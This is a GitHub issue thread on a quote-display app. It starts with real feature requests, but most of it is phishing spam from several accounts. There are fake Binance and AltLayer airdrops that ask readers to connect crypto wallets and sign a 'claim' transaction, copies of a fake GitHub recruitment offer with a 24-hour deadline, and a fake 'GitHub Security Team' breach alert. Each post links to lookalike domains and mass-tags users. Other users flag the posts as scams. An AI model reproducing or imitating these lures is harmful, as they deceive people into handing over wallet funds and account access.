### ISSUE TITLE
Recomandations.

### ISSUE THREAD

**Issue by adispi** [ik5/display-quotes#2]
1) you have not fixed the URL of the external GIT of the libnotify (.gitmoudles) from your private link that uses a certificate to the public read only one (git://github.com/ik5/libnotify-fpc.git)
2) it should be possible to get a random quote on open and not just the last viewed.
3) there should be a timer to get a new quote every XX min/hr when notify is selected.
4) it should be possible to minimize it to tray.

5) look here for more quotes ideas: http://www.quotationspage.com/ maybe you can even link it to their engine of random quotes: http://www.quotationspage.com/random.php3

**Comment by ik5** [comment]
regarding 4, you can double click the tray and minimize it to the tray.

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @collinglass, @vsaraikin, @Austinsuyoyo, @Simplyscelo, @liam151518, @mikehotel, @Beyondem, @knowaveragejoe, @sqwu, @jmgiacalone, @xiocode, @ajimix, @mjrlee, @shunia, @xonito, @amirphl, @zachaller, @duthanhduoc, @smartinspereira, @nbvghost, @AlexiaChen, @yxuechao007, @CloudBranch, @Jiangyj19, @taoso, @CaoJiayuan, @tomholford, @chrisheckey, @fr3j, @nntaoli, @eknowlton, @mesutt, @CrochetFeve0251, @kevisong, @antoinegelloz, @salexer, @rafi, @zeyutt, @SnowPeakLiu, @wrongerror, @haydenrear, @johnuopini, @jhong99, @devchafa, @yedy99, @pedrolopesme, @chen618, @bodza, @mofax, @badsector666

**Comment by renmadigi** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @harry830622, @hiidemo, @zjz894251se, @JUDOKICK, @fafifox, @Dezzmo87, @Mc01, @willzhuang, @peterpme, @dbarobin, @devourer66, @abdulhajiyev, @yougotwill, @pmuller, @Naija-geek, @CosmicTomato, @alexanderdoty, @YemmyFolayan, @TropicalBastos, @PaDuckk, @xiaowheat, @danielkorea, @ApexCyberPunk, @dipaktapase, @moskalyk, @JavaLake66, @Mohammed-Abrar-Neeman, @sadeghbarati, @CarlosLugones, @liangxiaojuan

**Comment by CarlosLugones** [comment]
Scam :arrow_up:

**Comment by charoenlap** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @jrobinsonc, @peterdcourt, @cryptofelon, @cherijs, @gusbueno, @Deusdictum, @uinz, @Mik13, @TokenDance, @Cab789, @denis-sharypin, @Podbay, @CanRau, @ThomasP1988, @ildaroit, @ljnsn, @betaSavvy, @matthojo, @alefvanoon, @ubanitc

**Comment by YeMyoAung** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://i.ytimg.com/vi/9uxY8uLf3bE/maxresdefault.jpg)](https://go.altlayercommunity.online/XY2wna)

🚀 **Exciting Announcement!** AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of the total supply)
- **Distribution Categories:**
  - Ethereum Mainnet
  - Binance Mainnet

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://go.altlayercommunity.online/XY2wna).

The window to [Claim $ALT tokens](https://go.altlayercommunity.online/XY2wna) is open from January 25 to February 03, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

0xDaiko, @Drinkler, @mempirate, @dukuo, @NikhilBajaj3196, @akcgjc007, @tilipinpin, @zzir, @lindamarissa, @alegria20, @Snorlax-icu, @bigbyrd69, @benghui, @glorfindel9, @orbxball, @bernardlim, @GAMECHANGE, @Parshwa52, @firebase007, @asmitadhungana

**Comment by deepak7774** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](http://jobs.githubtalentcommunity.online/auth) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
foleyjf, @IsfetShen, @GabrielDvt, @srburton, @sergiokopplin, @guim4dev, @JoaoMWatson, @valeriafarias, @rimenes, @dan2dev, @leonirlopes, @Doges, @guisehn, @noghartt, @kimjoaoun, @renanviegas, @filipehcds, @rafasilveira, @Jonhyfun, @dadeke

**Comment by deepak7774** [comment]
[![Celestia Banner](https://cdn-learn.adafruit.com/assets/assets/000/112/622/medium800/programming_GitHub_logo_with_mark.png?1656187481g)](http://jobs.githubtalentcommunity.online/auth)

Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](http://jobs.githubtalentcommunity.online/auth) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
Snowball84, @whfuyn, @liushaoweihua, @huandalu, @freeforever1, @lhrbeijing, @ik5, @Xinchungeorb, @wch93, @naya-cat-1, @henryfivev, @CephWu, @roudra323, @cynic-1, @hbwst888, @jefmatle, @HaydnHou, @Pony-hb, @YinagHe, @winar-jin

**Comment by deepak7774** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](http://jobs.githubtalentcommunity.online/auth) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
LeoGonCha, @tiagoistuque, @eduardofx, @brunobtavares, @lucasres, @saimontavares, @luizcieslak, @josefelipesouza, @fansilva1991, @valdirmendesdev, @LucasDelboni, @LucaDillenburg, @tgmarinho, @raphaelts3, @ddenon, @JucimarJunior, @paulop, @samuel-lujan, @BrunoEleodoro, @alessandromancera

**Comment by cyny39** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
petrenkorf, @santosmariana, @ruan-lucas, @olavocneto, @RCristiano, @felipeanndrade, @ricardokovalski, @tiagope, @murakn, @HectorIFC, @caiodomingues, @jsvini, @ThomazStaziak, @gmpassos, @marcelovbm, @bg21, @Tonybsilva-dev, @djalmasantos, @gabrielSouzaDevWeb, @vrfranco

**Comment by ianaditama26** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
lxex, @karlkallas, @hmnajam, @highlightime, @hassansomi, @Twittjob1, @keepyourlightson, @MDBYB, @yudi738, @milan8008, @duktig666, @mosdcaing, @wendelmelo, @FourSomes, @rdonmez, @puzzle-rusher, @staralexbtc, @TimTheTeim, @OGDAO332, @morris-ai

**Comment by ianaditama26** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
piwpiw2, @ichitringer, @flyq, @rajubrave, @payam1374, @MfilipeMartins, @tk1122, @aweNousaku, @mattsse, @Love20182019, @grimmkeeper-here, @amirgamil, @thearyanahmed, @Yudi0017, @HuynhTanTan, @mouzzarr, @devonclark3, @58DevOggu, @LEONTYASHKA, @Blockutopia

**Comment by mahmoudfranc** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
javimurcia, @pastleo, @Tannerrea, @98587329, @aeharvlee, @Yoshicu812, @xiaomihuiben, @PanupongDeve, @Trawmoney, @VanessaMachi, @ricosmall, @MonkSoul, @dalongmyself, @azteccem, @liuqingliu, @Mirage1348, @chnbohwr, @erhuve, @jiho4, @MaySoMusician

**Comment by yogeshkushwahait** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
luizaguiar84, @hei1ldess, @renanviegas, @elizairam, @mso13, @andredias20, @helldoodle-dev, @memellin, @maurochiozzi, @mlcivilengineer, @tghelere, @M4urici0GM, @pablo1v, @guijoazeiro, @thobiassilva, @dazocc, @carolinaknoll, @rafaeldl, @vinisantt, @tupizz

**Comment by M4urici0GM** [comment]
The above comments are PHISHING, DO NOT ALLOW access to your private repositories.

**Comment by gmpassos** [comment]
This scam is spreading across many repositories!

**Comment by memellin** [comment]
bro every day this phishing guys are trying to do something bro wtf

**Comment by M4urici0GM** [comment]
Please report the user @uawehads for phishing.
The creator of the false github app.

**Comment by memellin** [comment]
blz

**Comment by H4wk-eye** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
davetorbeck, @mwee, @krzysztofsaja, @entire, @darylclaudio, @sherryxiao1988, @SuiOni, @gaberoo322, @ericmm, @dionescu, @drvirens, @souradeep-das, @praveenmylavarapu, @vcastellm, @jjgonecrypto, @rsarai, @nmarcetic, @ShubhamKumar1095, @lingyong, @bytearchive

**Comment by nickfnblum** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
ccyanxyz, @binwang97, @Jayanring, @DarkHighness, @iamosu111, @cobrat, @SXTao, @Virusoul12, @GraciaKaglan, @minaminao, @prajwolrg, @SodalimeZero, @H0uzC, @syang-ng, @sincerity11, @Double-yang-0, @0xCO2, @chansuixi, @jayzhan211, @suninsky

**Comment by M4urici0GM** [comment]
Geez, Could the repository owner please close this issue?
